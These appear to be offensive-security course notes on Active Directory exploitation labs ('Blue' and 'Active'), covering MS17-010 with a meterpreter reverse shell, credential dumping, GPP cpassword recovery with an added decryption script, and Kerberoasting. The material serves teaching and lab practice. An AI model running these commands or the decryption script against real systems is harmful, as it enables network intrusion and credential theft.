Week 10: MS17-010, GPP/cPasswords, and Kerberoasting
AD Exploitation Part 3
Blue
If you see SMB on a network, immediately check whether it's vulnerable to MS17-010. The exploit can take the service down, so ask before running it.
nmap -Pn -p445 --script=smb-vuln-ms17-010 <ip>
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > sysinfo
meterpreter > hashdump
meterpreter > shell
c:\Users\Administrator>arp -a
c:\Users\Administrator>route print
# check if the machine is dual-homed: with two NICs you can pivot
# e.g. if it sits on both 10.10.10.X and 10.10.11.X
c:\Users\Administrator>netstat -ano
^C terminate channel -> back to meterpreter
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > load kiwi # this is x64
meterpreter > creds_all
meterpreter > wifi_list
Mimikatz is for the 32-bit architecture and kiwi is for the 64-bit architecture.
Active
A 'realistic' box. Likely a domain controller, since it's running DNS, Kerberos and LDAP for Active Directory. Domain: active.htb. When there's SMB, check for anonymous login. See Group Policy Pwnage.
Enumeration
Likely a Domain Controller since it's running DNS, Kerberos and LDAP. Domain: active.htb. As is common on domain controllers, SMB message signing is enabled and required. Most SMB and NTLM relay is done against machines other than the Domain Controller, since signing is usually turned off on them.
We could maybe dump LDAP information, but we typically won't have access to that without credentials. 445 and 139 are very interesting because SMB is behind a lot of exploits.
Let's try to list the SMB shares.
Anonymous login is a finding. Absolutely list shares on a report. Let's see what we can connect to; the juiciest folders are C$ and ADMIN$.
We can connect to Replication and IPC$. Replication might be a backup of something. Let's mget everything in Replication.
Groups.xml is promising. Let's cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml.
Groups.xml is related to GPP (Group Policy Preferences), which lets Domain Admins create domain policies with embedded credentials. We find: userName="active.htb\SVC_TGS" and cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ". SVC_TGS is the Ticket Granting Service account. Groups.xml exists on some active domains, usually older ones, but migrated ones may still have it. You can also set one up as a honeypot: a GPP that has never been used. As soon as those credentials are used, you know there's a hacker on the network.
New creds (from the decrypted cpassword): active.htb\SVC_TGS with password GPPstillStandingStrong2k18. We could push the creds around with crackmapexec, log in to SMB with this account, or use psexec on this machine. Another tactic is Kerberoasting.
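As an added example (not part of these course notes), a small sh audit that pulls every cpassword out of a Groups.xml and decrypts it with the AES key Microsoft published for GPP in MS-GPPREF, which is why a cpassword in SYSVOL has to be treated as a plaintext password and the account behind it reset. The Groups.xml is a constructed sample built from the attributes quoted above, and openssl, base64 and iconv are assumed to be installed.

```shell
#!/bin/sh
# Added example, not from the course notes: audit a Groups.xml for GPP
# cpassword attributes and show that each one decrypts with the AES-256 key
# Microsoft published in MS-GPPREF 2.2.1.1.4, i.e. a cpassword in SYSVOL is a
# plaintext credential and the account behind it must be reset.
# Needs openssl, base64 (coreutils) and iconv.

GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_IV=00000000000000000000000000000000   # CBC with an all-zero IV

# Decrypt one cpassword value and print the UTF-8 plaintext.
gpp_decrypt() {
    cp=$1
    # GPP strips the base64 '=' padding; restore it before decoding.
    while [ $(( ${#cp} % 4 )) -ne 0 ]; do cp="${cp}="; done
    printf '%s' "$cp" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
        | iconv -f UTF-16LE -t UTF-8        # the password is stored as UTF-16LE
}

# For every <Properties .../> element that carries a cpassword, print
# "<userName> <plaintext>" so the exposed accounts can be listed and reset.
audit_groups_xml() {
    grep -o '<Properties [^>]*cpassword="[^"]*"[^>]*>' "$1" \
    | while IFS= read -r props; do
        user=$(printf '%s' "$props" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
        cpass=$(printf '%s' "$props" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
        printf '%s %s\n' "$user" "$(gpp_decrypt "$cpass")"
    done
}

# Constructed sample: the Groups.xml element from the notes above, reduced to
# the attributes that matter for the audit.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
EOF

audit_groups_xml "$SAMPLE"   # prints: active.htb\SVC_TGS GPPstillStandingStrong2k18
```

Run it against each Groups.xml (and the other Preferences XML files) under your own SYSVOL share; any line it prints is an account whose password should be reset and whose policy should be rebuilt without a cpassword.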
Kerberoasting
Kerberos: an authentication protocol using tickets to communicate and authenticate.
We have a server that acts as the KDC (Key Distribution Center) and another computer, the client. The client wants to authenticate, so it sends its credentials and asks the KDC for a TGT (a ticket-granting ticket). The KDC checks the creds and, if they are good, sends back the TGT, encrypted with the TGS's secret key; the client caches it until it expires. There are also services (SQL, antivirus, etc.) that the client might want to connect to, and each service has a Service Principal Name (SPN). To connect, the client presents its TGT to the KDC and asks for a service ticket for that SPN. With any valid TGT, we can request a TGS ticket for any SPN, and that service ticket is encrypted with the service account's own secret, which is what makes it crackable offline.
Impacket allows us to do this. Mine is located: /opt/impacket/examples/GetUserSPNs.py.
We can try to crack this offline with hashcat. Save the hash into a file.
Gaining Access
Now onto psexec.
Let's try exploit targets other than automatic.
Okay, got a meterpreter session open, but the meterpreter is x86 and the machine is x64. Let's try again with a different payload.